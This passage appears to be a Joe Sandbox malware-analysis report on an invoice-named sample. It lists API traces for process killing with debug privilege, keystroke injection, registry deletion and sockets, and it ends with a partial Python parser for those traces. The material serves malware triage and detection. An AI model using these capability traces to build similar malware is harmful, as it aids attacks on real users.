                                                              • Instruction Fuzzy Hash: 4B518B70A20309EFDB24DF68DC95FAA77B8AF48354F504618F946972E1D7B0ACA0DB50
                                                              APIs
                                                                • Part of subcall function 00236EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00235FA6,?), ref: 00236ED8
                                                                • Part of subcall function 00236EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00235FA6,?), ref: 00236EF1
                                                                • Part of subcall function 002372CB: GetFileAttributesW.KERNEL32(?,00236019), ref: 002372CC
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 002375CA
                                                              • _wcscmp.LIBCMT ref: 002375E2
                                                              • MoveFileW.KERNEL32(?,?), ref: 002375FB
                                                              Similarity
                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                              • String ID:
                                                              • API String ID: 793581249-0
                                                              APIs
                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0026DAD1,00000004,00000000,00000000), ref: 0020EAEB
                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0026DAD1,00000004,00000000,00000000), ref: 0020EB32
                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0026DAD1,00000004,00000000,00000000), ref: 0026DC86
                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0026DAD1,00000004,00000000,00000000), ref: 0026DCF2
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0022AEF1,00000B00,?,?), ref: 0022B26C
                                                              • HeapAlloc.KERNEL32(00000000,?,0022AEF1,00000B00,?,?), ref: 0022B273
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0022AEF1,00000B00,?,?), ref: 0022B288
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0022AEF1,00000B00,?,?), ref: 0022B290
                                                              • DuplicateHandle.KERNEL32(00000000,?,0022AEF1,00000B00,?,?), ref: 0022B293
                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0022AEF1,00000B00,?,?), ref: 0022B2A3
                                                              • GetCurrentProcess.KERNEL32(0022AEF1,00000000,?,0022AEF1,00000B00,?,?), ref: 0022B2AB
                                                              • DuplicateHandle.KERNEL32(00000000,?,0022AEF1,00000B00,?,?), ref: 0022B2AE
                                                              • CreateThread.KERNEL32(00000000,00000000,0022B2D4,00000000,00000000,00000000), ref: 0022B2C8
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                              • API String ID: 0-572801152
                                                              APIs
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                                • Part of subcall function 0020C6F4: _wcscpy.LIBCMT ref: 0020C717
                                                              • _wcstok.LIBCMT ref: 0024184E
                                                              • _wcscpy.LIBCMT ref: 002418DD
                                                              • _memset.LIBCMT ref: 00241910
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                              • String ID: X$p2*l2*
                                                              • API String ID: 774024439-2958633995
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00259B19
                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00259B2D
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00259B47
                                                              • _wcscat.LIBCMT ref: 00259BA2
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00259BB9
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00259BE7
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$Window_wcscat
                                                              • String ID: SysListView32
                                                              • API String ID: 307300125-78025650
                                                              APIs
                                                                • Part of subcall function 00236532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00236554
                                                                • Part of subcall function 00236532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00236564
                                                                • Part of subcall function 00236532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 002365F9
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0025179A
                                                              • GetLastError.KERNEL32 ref: 002517AD
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002517D9
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00251855
                                                              • GetLastError.KERNEL32(00000000), ref: 00251860
                                                              • CloseHandle.KERNEL32(00000000), ref: 00251895
                                                              Strings
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              APIs
                                                              • LoadIconW.USER32(00000000,00007F03), ref: 002358B8
                                                              Strings
                                                              Similarity
                                                              • API ID: IconLoad
                                                              • String ID: blank$info$question$stop$warning
                                                              • API String ID: 2457776203-404129466
                                                              APIs
                                                              • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0023A806
                                                              Similarity
                                                              • API ID: ArraySafeVartype
                                                              • String ID:
                                                              • API String ID: 1725837607-0
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00236B63
                                                              • LoadStringW.USER32(00000000), ref: 00236B6A
                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00236B80
                                                              • LoadStringW.USER32(00000000), ref: 00236B87
                                                              • _wprintf.LIBCMT ref: 00236BAD
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00236BCB
                                                              Strings
                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00236BA8
                                                              Similarity
                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                              • API String ID: 3648134473-3128320259
                                                              APIs
                                                                • Part of subcall function 00253C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00252BB5,?,?), ref: 00253C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00252BF6
                                                              Similarity
                                                              • API ID: BuffCharConnectRegistryUpper
                                                              • String ID:
                                                              • API String ID: 2595220575-0
                                                              APIs
                                                              • select.WSOCK32 ref: 00249691
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0024969E
                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 002496C8
                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002496E9
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 002496F8
                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 002497AA
                                                              • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0028DC00), ref: 00249765
                                                                • Part of subcall function 0022D2FF: _strlen.LIBCMT ref: 0022D309
                                                              • _strlen.LIBCMT ref: 00249800
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                              • String ID:
                                                              • API String ID: 3480843537-0
                                                              • Opcode ID: 1c4d47eab74bd01c8e7d31f4163d96dd341b2ac85aa3f436e9fa0c8e2f2237bc
                                                              • Instruction ID: b775310474ae06f31da175b012ce8de560db7ec3439aa2fbf13ed948bf940dc7
                                                              • Opcode Fuzzy Hash: 1c4d47eab74bd01c8e7d31f4163d96dd341b2ac85aa3f436e9fa0c8e2f2237bc
                                                              • Instruction Fuzzy Hash: D4812E71114200AFC318EF64DC86E6BB7E8EF99710F104A1DF6599B2A2EB30DD54CB92
                                                              APIs
                                                              • __mtinitlocknum.LIBCMT ref: 0021A991
                                                                • Part of subcall function 00217D7C: __FF_MSGBANNER.LIBCMT ref: 00217D91
                                                                • Part of subcall function 00217D7C: __NMSG_WRITE.LIBCMT ref: 00217D98
                                                                • Part of subcall function 00217D7C: __malloc_crt.LIBCMT ref: 00217DB8
                                                              • __lock.LIBCMT ref: 0021A9A4
                                                              • __lock.LIBCMT ref: 0021A9F0
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,002A6DE0,00000018,00225E7B,?,00000000,00000109), ref: 0021AA0C
                                                              • EnterCriticalSection.KERNEL32(8000000C,002A6DE0,00000018,00225E7B,?,00000000,00000109), ref: 0021AA29
                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 0021AA39
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                              • String ID:
                                                              • API String ID: 1422805418-0
                                                              • Opcode ID: e8a312cb8ac239c9e3a139fde19138cfad7315f52e993abd871d4a2797dff46c
                                                              • Instruction ID: 33b37f77874cddca7fcbe3aa99c2331a4d095b0060ea9ad80e2a90226f96a52d
                                                              • Opcode Fuzzy Hash: e8a312cb8ac239c9e3a139fde19138cfad7315f52e993abd871d4a2797dff46c
                                                              • Instruction Fuzzy Hash: DA416B719226069BEB208F68DA887DDB7F0BF21734F148318E425AB2D1D77499E0CF81
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 00258EE4
                                                              • GetDC.USER32(00000000), ref: 00258EEC
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00258EF7
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00258F03
                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00258F3F
                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00258F50
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0025BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00258F8A
                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00258FAA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                              • String ID:
                                                              • API String ID: 3864802216-0
                                                              • Opcode ID: b319ad6e227d3aec7f87381fe040ba6424710efae66a71141a10ef5a501bdb13
                                                              • Instruction ID: d36bba161c3e94d0cd25c3ca4034b8b3bc57ef8628d86b981041e07b39319a3f
                                                              • Opcode Fuzzy Hash: b319ad6e227d3aec7f87381fe040ba6424710efae66a71141a10ef5a501bdb13
                                                              • Instruction Fuzzy Hash: E6317F72200214BFEB108F50DC4AFEA3BADEF49716F044065FE0CAA191C6B59851CB74
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • GetSystemMetrics.USER32(0000000F), ref: 0026016D
                                                              • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0026038D
                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002603AB
                                                              • InvalidateRect.USER32(?,00000000,00000001,?), ref: 002603D6
                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002603FF
                                                              • ShowWindow.USER32(00000003,00000000), ref: 00260421
                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00260440
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                              • String ID:
                                                              • API String ID: 3356174886-0
                                                              • Opcode ID: 2bd86f54617fe52272c4683c0e6a6685f73c7fe325f295b214ed266f792d673b
                                                              • Instruction ID: 86367cf6a0b3cafb4955861086a2d3cf6af4ee0e6da8627a36963922b551eef8
                                                              • Opcode Fuzzy Hash: 2bd86f54617fe52272c4683c0e6a6685f73c7fe325f295b214ed266f792d673b
                                                              • Instruction Fuzzy Hash: 21A1CC30610616EBDB18CF68C9D97AEBBB1BF08701F048255EC58AB290D770ADB0DB90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e87d46b65da556792037df3eb6fe82b8081c74fe70b64d64925ed0eb7f68d49
                                                              • Instruction ID: 345c828c46f7fcdc6f8b5a53e75e40057bd682d841c5e15db27399e38c846651
                                                              • Opcode Fuzzy Hash: 0e87d46b65da556792037df3eb6fe82b8081c74fe70b64d64925ed0eb7f68d49
                                                              • Instruction Fuzzy Hash: CF716D7091020AEFCF14CF98CC49EAEBB75FF85314F248149F915AA291C771AA61CF61
                                                              APIs
                                                              • _memset.LIBCMT ref: 0025225A
                                                              • _memset.LIBCMT ref: 00252323
                                                              • ShellExecuteExW.SHELL32(?), ref: 00252368
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                                • Part of subcall function 0020C6F4: _wcscpy.LIBCMT ref: 0020C717
                                                              • CloseHandle.KERNEL32(00000000), ref: 0025242F
                                                              • FreeLibrary.KERNEL32(00000000), ref: 0025243E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                              • String ID: @
                                                              • API String ID: 4082843840-2766056989
                                                              • Opcode ID: 05ff8fa9941192d40f520c21792e7a796b813b393c7de889170a3706f26e2c13
                                                              • Instruction ID: abac6f347a6dbd2e8b3bc7ddfa90188ef41686cfda7062f1635f8f3f522c4e1d
                                                              • Opcode Fuzzy Hash: 05ff8fa9941192d40f520c21792e7a796b813b393c7de889170a3706f26e2c13
                                                              • Instruction Fuzzy Hash: EC716BB4A10619DFCF04EFA4D885AAEB7B5FF49310F108459E859AB291CB30AD58CF94
                                                              APIs
                                                              • GetParent.USER32(?), ref: 00233DE7
                                                              • GetKeyboardState.USER32(?), ref: 00233DFC
                                                              • SetKeyboardState.USER32(?), ref: 00233E5D
                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00233E8B
                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00233EAA
                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00233EF0
                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00233F13
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: b2d694a75c2ff0dd2cdacd8f6841c140c976c374beed34b44517cd17c0a15be3
                                                              • Instruction ID: a459af421b05eddd82d8a51434b292def177f69be2e238027f9b2beca10b12fd
                                                              • Opcode Fuzzy Hash: b2d694a75c2ff0dd2cdacd8f6841c140c976c374beed34b44517cd17c0a15be3
                                                              • Instruction Fuzzy Hash: C151B4E0A247D63DFB368B248C46BB67EA95F06704F084589F1D9468C2D394EFE4D750
                                                              APIs
                                                              • GetParent.USER32(00000000), ref: 00233C02
                                                              • GetKeyboardState.USER32(?), ref: 00233C17
                                                              • SetKeyboardState.USER32(?), ref: 00233C78
                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00233CA4
                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00233CC1
                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00233D05
                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00233D26
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessagePost$KeyboardState$Parent
                                                              • String ID:
                                                              • API String ID: 87235514-0
                                                              • Opcode ID: 2dabdfe158bebd412d529525273119cdc14853f3e28c731f6af0c81e8a26685b
                                                              • Instruction ID: a1dd72cd4f18cbb8db44080514b9ffa956d57017351c0429b4320a8a0b6fbf6f
                                                              • Opcode Fuzzy Hash: 2dabdfe158bebd412d529525273119cdc14853f3e28c731f6af0c81e8a26685b
                                                              • Instruction Fuzzy Hash: DB51E8E05247D63DFB32CB348C46B7ABFA96B06304F088889E0D95A4C2D694EFE4D750
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcsncpy$LocalTime
                                                              • String ID:
                                                              • API String ID: 2945705084-0
                                                              • Opcode ID: 1594c20b29bdc3e723d29755c890b1b8186c7230881fdf9b6f877d5fb4a01ed4
                                                              • Instruction ID: 1cb50f32e795b732a5b555a3da1639e79a1879720a26b9488c421cbbeb0db744
                                                              • Opcode Fuzzy Hash: 1594c20b29bdc3e723d29755c890b1b8186c7230881fdf9b6f877d5fb4a01ed4
                                                              • Instruction Fuzzy Hash: 9D4152A6C30214B6CF20ABF4C8869CF73ECAF14310F504966E518E3121E675D6B48BE5
                                                              APIs
                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00253DA1
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00253DCB
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00253E80
                                                                • Part of subcall function 00253D72: RegCloseKey.ADVAPI32(?), ref: 00253DE8
                                                                • Part of subcall function 00253D72: FreeLibrary.KERNEL32(?), ref: 00253E3A
                                                                • Part of subcall function 00253D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00253E5D
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00253E25
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                              • String ID:
                                                              • API String ID: 395352322-0
                                                              • Opcode ID: 6d6cbfb23193eae1c20c9408af01e74d4554a758ba71313737760cdff72d20b5
                                                              • Instruction ID: cfb700c1abae9185a8f50c46a0a108f685108529ea171ef9b7fb5965b3b8abe6
                                                              • Opcode Fuzzy Hash: 6d6cbfb23193eae1c20c9408af01e74d4554a758ba71313737760cdff72d20b5
                                                              • Instruction Fuzzy Hash: A4315CB1911109BFDB14CF90DC8AAFFB7BCEF08351F00116AE912E2150D6709F888BA4
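                                                               The API listings in the two GetKeyboardState/SetKeyboardState/PostMessageW blocks and in the RegEnumKeyExW/RegDeleteKeyW block above are easier to triage once the raw hex arguments are mapped back to their Win32 names. The parser below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the analysed sample. It reads lines in the report's "APIs" format (bullet, optional "Part of subcall function" prefix, API.MODULE(args), ref: address), decodes only the constants whose values are certain (WM_KEYDOWN 0x100, WM_KEYUP 0x101, WM_SETFONT 0x30, BM_GETCHECK 0xF0, BM_SETCHECK 0xF1, VK_SHIFT 0x10, VK_CONTROL 0x11, VK_MENU 0x12, VK_LWIN 0x5B), and derives behavioural tags for a block. The sample input is constructed from lines copied out of the blocks above; the tag names and the ApiCall structure are this example's own conventions, not the report's.

```python
"""Parse Joe Sandbox 'APIs' trace lines and decode the Win32 constants in them."""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Constructed sample: lines copied from several function blocks of the report above.
SAMPLE_APIS = """\
• GetParent.USER32(?), ref: 00233DE7
• GetKeyboardState.USER32(?), ref: 00233DFC
• SetKeyboardState.USER32(?), ref: 00233E5D
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00233E8B
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00233EAA
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00233EF0
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00233F13
  • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
• __lock.LIBCMT ref: 0021A9A4
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00253E25
"""

# Win32 constants from winuser.h; only values known with certainty are listed.
WINDOW_MESSAGES = {0x0030: "WM_SETFONT", 0x00F0: "BM_GETCHECK", 0x00F1: "BM_SETCHECK",
                   0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP"}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
MESSAGE_APIS = {"PostMessageW", "SendMessageW", "PostMessageA", "SendMessageA"}

Arg = Union[int, None]   # None stands for the sandbox's '?' (value not resolved)

# One trace line: optional subcall prefix, API.MODULE, optional (args), ref: address.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int                        # address of the call site
    subcall_of: Optional[int] = None  # set when the line came from a subcall


def parse_apis(text: str) -> List[ApiCall]:
    """Parse every call line in an 'APIs' block; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers such as 'APIs' or 'Strings' are not call lines
        raw = m.group("args")
        args = [] if not raw else [None if a.strip() == "?" else int(a, 16)
                                   for a in raw.split(",")]
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def decode(call: ApiCall) -> str:
    """Render a call with recognised message and virtual-key constants named."""
    args = ["?" if a is None else f"0x{a:X}" for a in call.args]
    if call.api in MESSAGE_APIS and len(call.args) >= 3 and call.args[1] in WINDOW_MESSAGES:
        msg = WINDOW_MESSAGES[call.args[1]]
        args[1] = msg
        if msg in ("WM_KEYDOWN", "WM_KEYUP") and call.args[2] in VIRTUAL_KEYS:
            args[2] = VIRTUAL_KEYS[call.args[2]]
    return f"{call.api}({', '.join(args)})"


def tag_block(calls: List[ApiCall]) -> List[str]:
    """Behavioural tags for a block, derived only from the decoded calls (example's own names)."""
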